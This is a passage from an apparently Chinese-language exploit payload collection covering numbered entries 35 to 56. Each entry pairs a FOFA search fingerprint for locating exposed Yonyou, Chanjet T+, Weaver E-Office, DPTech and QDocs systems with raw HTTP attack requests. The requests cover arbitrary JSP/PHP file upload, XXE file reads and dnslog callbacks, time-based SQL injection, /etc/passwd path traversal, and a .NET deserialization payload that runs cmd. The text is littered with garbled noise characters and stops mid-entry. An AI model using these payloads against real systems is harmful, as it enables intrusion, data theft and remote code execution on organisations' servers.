2 m/ o- w7 P( u& c) E35. 用友NC-Cloud importhttpscer任意文件上传$ V3 o! z. Y: t: T% ^
FOFA:app="用友-NC-Cloud", I, J3 O1 K; `: @$ u
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
' j1 n( i3 n4 C- uHost: 203.25.218.166:88880 [* A: m/ f. Z; o5 u3 @$ o
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info4 \1 R! y m) M. N+ m0 _
Accept-Encoding: gzip, deflate
6 U* M8 a, Y Z" O9 V& eAccept: */*5 f) l) S' q3 s9 Y$ m
Connection: close
! f3 a7 J4 H- `- Q c& TaccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA! d9 [4 `* Q L8 n. I. g
Content-Length: 190# e8 o% `8 g; s( u; V) A& V
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
4 e" m6 X$ H1 `0 N7 L3 A [
0 l( [2 A# K* F0 ^ E' H x--fd28cb44e829ed1c197ec3bc71748df0
# q% C7 U6 {' m. tContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
, p" |9 r; K9 D5 m* O4 ?/ a m+ o2 t: d6 y8 H, F$ P- ]8 E3 Z
<%out.println(1111*1111);%># a( _0 |3 G( i, R6 T
--fd28cb44e829ed1c197ec3bc71748df0--/ R5 K# X8 c/ {5 u' ^5 V
. e3 O! j1 r* @2 F
- o' c- j3 `, A) |36. 用友NC-Cloud soapFormat XXE0 g. t$ n; v% W5 K E
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
. b# n& f7 k8 G5 z7 B' kPOST /uapws/soapFormat.ajax HTTP/1.1& \( E- ?6 R# n6 H7 H) W% |
Host: 192.168.40.130:8989: C2 I4 I" ?8 f& X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.07 J+ P# e# l1 e! j( V% @
Content-Length: 263
0 Y! L& Q- {" T- y2 }3 g6 \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 R+ \# X+ E5 D2 l( h
Accept-Encoding: gzip, deflate
/ l0 {) H3 w( b E2 g$ WAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 R' T" _3 n$ r7 p9 ^ I( ~: f
Connection: close7 c8 b! l- R! ~2 q$ Y
Content-Type: application/x-www-form-urlencoded% a/ z3 V6 h% Z7 j% Z
Upgrade-Insecure-Requests: 1
* p1 O3 U0 p+ ?2 u! l. k9 X
" }2 i* M2 \, u' k; d _msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
! ]3 @$ r+ D: W0 W- a" F0 V0 {& L/ Q( ^; d+ ~# C" Z' P. f
. r6 s% Q9 M1 d: z( z% c* O( h4 W) g
37. 用友NC-Cloud IUpdateService XXE
+ i: r+ `) l& p' D& ^- i1 OFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/" }- _( Y# q9 ~$ I' x8 u3 X$ u9 l
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1$ [! z9 X" Q3 |/ m
Host: 192.168.40.130:8989
; ]8 C: g: b5 A kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
; r* m! T8 k1 ~) b2 h3 e% i7 p2 ]Content-Length: 4211 e6 b, Z+ @- R0 K6 L
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
6 \: @( L9 u+ ~1 K' h5 p# GAccept-Encoding: gzip, deflate
. w. n$ Z6 x A# WAccept-Language: zh-CN,zh;q=0.9/ p7 N' p c! w5 P
Connection: close& v% x1 @7 u5 N
Content-Type: text/xml;charset=UTF-8
. f9 J/ x8 I' R2 k. W% P& w" i5 ]SOAPAction: urn:getResult: M+ @" I/ F8 _9 i' i. \+ X* f
Upgrade-Insecure-Requests: 1# U2 s$ Y' `+ R: M1 \) y
4 L! a& E6 l( Z' T% p2 x+ R$ ^<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
$ \, S4 y" S9 E<soapenv:Header/>/ c* S" Z; H2 f2 G: y' q" ~
<soapenv:Body> Z" G9 `. \; D8 j, u: P
<iup:getResult>
* ] j- U9 ~7 D8 X<!--type: string-->
% ]$ D# ^: b0 a; A+ b4 x% E- c<iup:string><![CDATA[6 o0 e. w( Y+ ~8 j" i* U
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
2 X, h9 B: s! Y7 C @, }! c( ?<xxx/>]]></iup:string>3 O" g, g8 a1 @5 o$ t8 k
</iup:getResult>
$ H' [8 d) u8 g$ z9 [</soapenv:Body>
$ E, Y. ^ O8 Z6 m4 }! I F* V</soapenv:Envelope>
: x' \, N, L z: N$ c
; y( N% n- w4 R+ P. n9 g( Y8 L" X3 G& O0 O \, I; M7 X
! m" F& y1 M% @4 T7 u2 Z% o
38. 用友U8 Cloud smartweb2.RPC.d XXE
1 y E6 Y; O8 K9 I! I3 m1 D% qFOFA:app="用友-U8-Cloud"
2 m% N5 r& L9 U' Y- |POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
! K' h, u' Q- Q7 F* S' J1 hHost: 192.168.40.131:8088
# K6 B6 M% [* V. C" EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25' I8 s/ M1 o5 o: |3 [6 r/ X
Content-Length: 260
) X9 W6 Y$ L6 ~* [& DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
' [/ ^& ?! U5 V3 y: C& A: gAccept-Encoding: gzip, deflate$ |7 B, X* s6 G; h. c) e. z; [0 r
Accept-Language: zh-CN,zh;q=0.9
3 _. L, t9 D. M2 L; K) bConnection: close
: m- t' s6 x; e8 }! U" y5 G0 v% U- B0 VContent-Type: application/x-www-form-urlencoded
- o; ~* o2 y' v$ O+ U, U8 A, \8 X2 h( J) n1 n% L
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
1 f5 {: a2 S# y
8 }: q8 N! [ y8 Z8 N7 O$ a. N# V" {8 y5 m5 q, X
39. 用友U8 Cloud RegisterServlet SQL注入
' R+ Y% r7 I# tFOFA:title="u8c"
0 x( e8 {$ }" M7 XPOST /servlet/RegisterServlet HTTP/1.1
# M9 Y$ ?5 R9 W* S$ ^* K4 ?Host: 192.168.86.128:8089
, I# i# ~/ j4 C* B. m- xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.369 {3 t) E) N; Q. j
Connection: close; U+ k* `: q ?- S
Content-Length: 85
; K; E. J0 p4 RAccept: */*! n7 f3 I: G* o# j. F2 d
Accept-Language: en
+ w8 p: s! W: u, r- `6 {. uContent-Type: application/x-www-form-urlencoded
% {: Z& N: Z. ^9 E8 {X-Forwarded-For: 127.0.0.1/ P; d/ {" I5 a/ I& A. l; K
Accept-Encoding: gzip: ~0 w1 ?7 {# M6 z8 C9 u% u
: q. W0 Z* ?* m6 I6 ?
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
$ S! s# E- ^& k5 g- S/ W
2 q8 u7 ?& L0 S' K, K6 ^4 O5 r% ]6 ?0 \1 W" ]9 c
40. 用友U8-Cloud XChangeServlet XXE) n5 ^0 S6 b1 s( u: c, a
FOFA:app="用友-U8-Cloud"/ V$ ^3 {* ?5 U2 h! g0 ?
POST /service/XChangeServlet HTTP/1.1 N& [9 S% ] [' F5 ]7 |) I
Host: x.x.x.x
1 T0 S1 p7 F: G2 D' wUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36! S0 T+ _# x7 a1 [2 e# q
Content-Type: text/xml: M/ G9 p% n9 Z Y& i
Connection: close3 ?6 N: Z" N, J& G1 G. \
9 X7 Q; F+ }5 j4 K0 y6 |" v<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
1 C3 `( f- e& v; c* h$ V% Y7 L7 q; U- H# M- D
; X z3 {9 m& V; \
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入: a& Q4 F/ U2 ^8 V' f
FOFA:app="用友-U8-Cloud"
, V7 a9 p, u4 T$ ]5 _GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1* \* W! B) d1 `2 Q5 [; [
Host:
% B; g" ]# b8 D' W* [- k" HUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15, K- L$ u# J( h0 U+ [
Content-Type: application/json
6 p# T! y9 W+ T% q! KAccept-Encoding: gzip
" N3 E/ w9 X3 n9 B( N: R* ` j: VConnection: close; a7 Z! A# d, h& B0 H, R
0 v( v9 m9 }" j
! k# |7 e! k$ P1 V2 t! v! \, V42. 用友GRP-U8 SmartUpload01 文件上传. R/ V5 k/ w: y# k* o1 e
FOFA:app="用友-GRP-U8"$ h7 X; A [1 C! p& y* ?
POST /u8qx/SmartUpload01.jsp HTTP/1.1; ?- f/ e4 T; r ]& h) _& z
Host: x.x.x.x$ ?2 V# I+ ~: U' X" ~ |/ p
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
* H4 R/ |( z- O9 r2 i: @6 jUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
$ F4 S7 j8 f( n+ u: |4 u1 ]8 \& n
5 m8 z9 g7 q5 iPAYLOAD" T, h. m, B3 h+ K4 P! i4 I
! P; r1 \3 G1 v8 G$ e/ i8 ?
+ x, E# \) e0 d# Phttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml0 V/ X2 }: s" j4 e
6 W+ {4 j% s6 h2 t
43. 用友GRP-U8 userInfoWeb SQL注入致RCE; c) G4 ?% ]7 Q
FOFA:app="用友-GRP-U8"! b4 H- s" [" t. f/ B. E
POST /services/userInfoWeb HTTP/1.1
* T1 R _* ^' W0 p* hHost: your-ip
& |6 S' I. {& u) \; UUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
]' k# d* l2 y* cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: } T% T# {( \ }6 ~6 }5 T
Accept-Encoding: gzip, deflate
" C9 |" R/ c3 r" d# @/ |4 zAccept-Language: zh-CN,zh;q=0.9
+ \1 D4 K( e* o+ c. f% K7 l% b# tConnection: close
: A+ A, [" k) ~6 `" LSOAPAction:* x4 h6 N% t; E& ^/ j- Q
Content-Type: text/xml;charset=UTF-8( T+ s$ D4 S8 |
C9 x8 p, q4 R/ U. o
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">; G9 Z1 u, V, y7 P8 [4 [
<soapenv:Header/>
% _. T% V% u5 j, _ <soapenv:Body>
6 F) v8 ]# K/ \2 h) \6 H ?' G% { <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
9 g) E5 s9 A0 Y+ D <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>+ P! D0 h1 }$ K* @
</ser:getUserNameById>
+ @; o; X% w r! @( ?7 S6 W </soapenv:Body>
- ^1 ]0 |, ?; y2 r! Y</soapenv:Envelope>$ p6 n. }0 G% I# r7 X
- B; ?' n) q& y9 c* D
! V/ _- O# g p( z$ a44. 用友GRP-U8 bx_dj_check.jsp SQL注入: @; i7 q$ E/ v, Y" o4 U9 C
FOFA:app="用友-GRP-U8"2 A4 n. y O. q4 Q' l* k
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.12 t1 U! k! k- M- H2 Q8 t, J5 v
Host: your-ip2 g. R( w. s& W. z8 ?. B/ S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36/ n9 ]8 Z U( n B. W1 Y" `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- d8 a' m, r" y3 q
Accept-Encoding: gzip, deflate# C6 c8 e& Q& b7 l; a3 b
Accept-Language: zh-CN,zh;q=0.9" v' h4 z5 H- O# S. k( M
Connection: close
2 |$ S, j/ Y( E5 g7 P& t
% K/ e% y" N. s) g/ w
' h2 Z, j( u8 e5 ~- Q, M, R; W2 g45. 用友GRP-U8 ufgovbank XXE& n, B9 ^2 z) J" |. B
FOFA:app="用友-GRP-U8"
) w0 K2 q' w+ L! J2 dPOST /ufgovbank HTTP/1.1# D+ b/ t" |! q2 F/ C8 h1 c% F/ Y
Host: 192.168.40.130:222! T* H4 C" V, o9 K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.05 z4 Q0 L+ I/ P1 x
Connection: close
8 [$ y9 i9 _4 w2 S! |6 O3 Q# wContent-Length: 161" V* v: `* o3 D0 j- b( S( E' \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8& ~, ?; i& X" g- C b
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# z( u/ b, F# ?% ?1 d8 {5 t( S) `
Content-Type: application/x-www-form-urlencoded A! V) |5 T1 a! n3 Q0 D
Accept-Encoding: gzip
1 h5 }" A' Q# U! |( X/ S: ~. u
3 o' X- ~: j5 XreqData=<?xml version="1.0"?>3 p( z& `" Y/ _' o
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest ?, G, C% F/ X- K) x9 k
5 ?- X& P$ v+ h7 z! D/ b) b
: W1 Y1 p3 i8 M z' ^: b4 a$ X46. 用友GRP-U8 sqcxIndex.jsp SQL注入6 ]5 X) i: b: H/ s* G9 e0 f
FOFA:app="用友-GRP-U8"
+ H. E8 T7 E" u; w/ xGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
8 u& h$ u- p7 B* a4 cHost: your-ip
1 t4 B/ A( G/ Y" J. w- ], {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.361 G! o2 n6 {) g% p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 C) Z! X+ ` V0 `: o9 X4 B( s8 zAccept-Encoding: gzip, deflate
( v( w [( k( f# S% ^; jAccept-Language: zh-CN,zh;q=0.99 h3 A4 v! l9 n& E% h
Connection: close
9 C. l( q7 y/ t$ H1 R# P
2 A% n5 o& m7 p
* j% v; _- ?4 q6 J6 ?47. 用友GRP A++Cloud 政府财务云 任意文件读取
- S/ G P6 e. q* }$ C% E. @0 uFOFA:body="/pf/portal/login/css/fonts/style.css"
+ F% k/ J9 I+ uGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
( M4 ^+ _5 \& r; r4 B, OHost: x.x.x.x
: P7 S: k5 e) a' F/ k) y; B. ~7 |# c$ [Cache-Control: max-age=0) @: Z( z7 T: l3 R
Upgrade-Insecure-Requests: 1
% o" l& ?% i$ S7 g" F) |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
" V, I, u2 ?7 h. D! IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 I! U$ b" d0 Z, {4 W0 d: b1 U) |Accept-Encoding: gzip, deflate, br; d1 {7 I: Z9 p( o
Accept-Language: zh-CN,zh;q=0.91 N, \2 V N7 `# t
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
3 r0 v7 y0 a& j2 l8 a4 CConnection: close
D/ I* N# a8 a% Y& i$ p. u6 U, N7 b
$ l2 i0 d3 E* E
9 z; W, E& t' f- a5 Y0 o
48. 用友U8 CRM swfupload 任意文件上传
- M& D9 O- b( K# Y8 u" v% X1 k" UFOFA:title="用友U8CRM") m) g Y+ Z" b' D6 v
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1. v( M# m u# H" o0 s1 n6 E' L
Host: your-ip
# Q/ l- i. D. s" A; g3 jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
4 o: e# ?! F3 ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& ~$ F+ g& b" f5 d9 Y) I. J2 l3 mAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 g; r2 G2 k+ J: R+ B# O) SAccept-Encoding: gzip, deflate
: n$ p* D' Y& k+ Q$ l, vContent-Type: multipart/form-data;boundary=----269520967239406871642430066855
$ a, p8 _, S; W0 N/ W------269520967239406871642430066855
8 r, B# T4 q8 V8 ?Content-Disposition: form-data; name="file"; filename="s.php"5 d7 X# j9 o5 |6 M8 R
12310 N: |9 S1 N+ f5 j
Content-Type: application/octet-stream+ }: z. R1 V, |. s) S- ?6 e
------2695209672394068716424300668552 O3 P8 x! A) E& i: C/ K
Content-Disposition: form-data; name="upload"
7 }3 o- x1 Z6 vupload
4 Q: X; _) X7 Z------269520967239406871642430066855--. s) K8 H3 D, I: Y6 R$ m% t& X2 @
( _& U* N0 \ [0 H
" S( k8 f9 t2 [8 {49. 用友U8 CRM系统uploadfile.php接口任意文件上传' [# D0 P5 b) z( r2 _
FOFA:body="用友U8CRM"0 T0 E$ }. `( \$ W+ }6 ]- m
# b- A3 ~" d6 K$ X7 [1 }+ RPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.14 y; r- k$ |+ G
Host: x.x.x.x7 Y s# M3 _' F8 t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
* @: E- p. t: q' ]& U& ~( q' CContent-Length: 329
: n1 N9 Z( @( o; w- d& k% G, fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8$ n/ l1 H' ?+ \9 J4 f4 m a' h
Accept-Encoding: gzip, deflate& r" w7 q: ?8 e; F3 R# E
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 P/ b8 I3 i( @+ v+ U4 [
Connection: close) @* _% \* c/ w! C+ C; G
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w: \9 ]. ^. W1 i/ I! y
! w3 ^' S! B D, i
-----------------------------vvv3wdayqv3yppdxvn3w
$ U; w& w# d) t( m4 GContent-Disposition: form-data; name="file"; filename="%s.php "7 h$ i$ {8 ?) w3 [8 ^$ y
Content-Type: application/octet-stream
9 F8 c6 F2 ]: s3 P; D
3 V1 t2 Q+ W. h& [* y6 Nwersqqmlumloqa6 P5 [, l) O; i E/ Q1 d
-----------------------------vvv3wdayqv3yppdxvn3w
3 m% }# m% q1 S9 R4 ]Content-Disposition: form-data; name="upload"# m( f$ d* f2 G: L: [ @5 ^ o
0 i/ S3 f% Z# p% f5 |$ U
upload0 j* q# O m# W5 G6 Q8 w
-----------------------------vvv3wdayqv3yppdxvn3w--
! z# X, T6 A: X9 O# x3 G0 a p
# x& H' w. H8 T( o, `
3 w1 H) {" s. H; `http://x.x.x.x/tmpfile/updB3CB.tmp.php
% F4 Y) a% \, _6 r. u |
4 b1 }8 ]8 s, ~+ F50. QDocs Smart School 6.4.1 filterRecords SQL注入* j" U* d. g, F$ v6 S
FOFA:body="close closebtnmodal"- C2 \! j" G& z' v
POST /course/filterRecords/ HTTP/1.1
& w0 l X* t- e7 dHost: x.x.x.x6 Q) \, b4 Y! A7 v% c- C) g8 W8 [; C
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
3 F' t3 U5 I! ^Connection: close/ ]: ~, @- f' c1 V" @3 A
Content-Length: 224
3 l/ ~$ }2 C3 o+ U. ?Accept: */*
8 g1 V: b7 K2 J( MAccept-Language: en, Y: Y' @) J. X6 Z2 [
Content-Type: application/x-www-form-urlencoded* ~3 L( f4 r! X; B l: ]# H* p
Accept-Encoding: gzip) r+ u0 q+ P8 C+ u$ ?7 v0 r
' p) |9 v1 M1 g1 ^, ~
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
0 E1 l! ^- F- S5 ?$ R# M+ x0 t) ~0 G' j9 n; C6 p
4 `* |1 C: s. ~' }8 U# v; e, N
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
+ O0 E; ^9 a6 c! Y GFOFA:app="云时空社会化商业ERP系统"
# K4 s3 n; K% A. SGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
% x' H- ` p0 G J/ V4 oHost: your-ip3 c; s9 V9 a; W: C& e
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.365 c: ]% d+ E: c- Q- }( D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
/ D3 Y2 s, M+ ~* GAccept-Encoding: gzip, deflate9 S- f5 {2 C' X' |' ?/ f6 I+ N; ~
Accept-Language: zh-CN,zh;q=0.9
. O6 n4 H6 S" _- zConnection: close
: W3 ?$ N; A: a! ?- A9 O0 ]8 Q: W& k8 Z+ P. `) i
2 N& C8 H: A6 v' W
52. 泛微E-Office json_common.php sql注入
% g; ~& W4 m4 [, VFOFA:app="泛微-EOffice"$ l. c7 f! p1 N; E3 S; o
POST /building/json_common.php HTTP/1.17 M# ?, Q. @9 }( y2 K# j- b! U7 ]
Host: 192.168.86.128:8097
5 K2 O0 u; f- o, N0 EUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
, r L! f/ `3 F5 V. `Connection: close
$ J+ S- U s, H3 ]6 N& S# r kContent-Length: 87
, A U5 Y. K2 j' n+ ?Accept: */*2 A( T p- i ^0 K; r4 l q
Accept-Language: en
) R D$ G+ k* f, [Content-Type: application/x-www-form-urlencoded+ |& J4 i/ j8 m' V
Accept-Encoding: gzip" ^( X0 ?. \( S: X
- u. ~; y2 V/ Y6 C, V9 j# C/ ptfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333$ b k+ C! ^2 [6 N" O% @; A+ u* y6 P% L
, Z* l* k. p9 Y
( A, ^4 X1 s% {9 p2 u# S% t5 w53. 迪普 DPTech VPN Service 任意文件上传8 M1 ]; X4 p: b B4 V
FOFA:app="DPtech-SSLVPN"
9 V; C* R2 ]% L8 p/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd/ x U, C$ {7 V# o9 h2 U
/ `" J" Y6 t' b5 y
: A! d: W) D; }' _
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
3 j( f+ v0 a- ]4 C' U* l! l2 @: iFOFA:app="畅捷通-TPlus"
6 i# H& v/ o+ D: A" U8 v* H' h第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件% }3 l: P3 {$ w2 O1 b3 Y0 d
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"7 |. ?: h3 ^* o
# h# \7 C; V* {3 _/ P+ O9 c; n
5 W7 t0 q$ j8 P3 Z- d4 C完整数据包
4 j- s9 @5 Z: u6 KPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1/ K- D" Z& R9 ]6 l- ^
Host: x.x.x.x
$ T2 m9 f4 y a0 ?" pUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
2 ], i2 V A8 L" N# IContent-Length: 593" X/ h$ i9 Z7 `0 Y; n F5 S+ u6 G4 |
7 n+ y( S; C* @) q+ p/ `{
; J$ h0 L$ N, H: }; z"storeID":{
3 g( o% G& t1 y5 v$ e) n "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",! E( j1 n% q! P! F
"MethodName":"Start",# U% L3 g$ o9 Q/ s9 d( K
"ObjectInstance":{
9 F' Q$ l7 L$ M) M' }# x "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",5 }8 [" S) w# ^- F6 i
"StartInfo":{5 d# i. r1 P- R, Z9 e
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
: ^1 D$ G# m( i/ D "FileName":"cmd",
. G& J' v+ g7 } E "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
, [5 O% g2 d& p6 A& u8 f }
' N' y9 C2 K& J5 ~ }
4 Q% n/ Q" E( X* O* B( a2 n }: @" W W6 r6 }" E" k* K/ V
}5 A0 S8 j n& G! D( p
. E8 t* C3 p' u5 S# Z8 [5 e6 Q2 @, p7 Z* `0 k
第二步,访问如下url" {7 F f @ S& q
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt- b4 W4 \. i4 k4 ~- Y
5 o- x( j* c/ A& `3 x- A1 f1 I
* O7 d7 O0 b, k8 d! p2 u
55. 畅捷通T+ getdecallusers信息泄露
8 Q5 E- f( K3 K2 P+ {* X' `7 GFOFA:app="畅捷通-TPlus"
8 S* p! r9 B' m5 H+ _) h: M; A第一步,通过/ g! L9 x4 J2 G5 W
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie& W& T, f, a" Y$ N
第二步,利用获取到的Cookie请求
8 S" i8 s1 V/ w- B U: v/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers8 s0 C; o$ _6 L2 E6 M) T( n( X
2 D( s" _; c g2 G
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE0 ?1 T. J, W+ t4 ?) P! {
FOFA: app="畅捷通-TPlus"! N9 F+ A( z9 T9 O, E
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
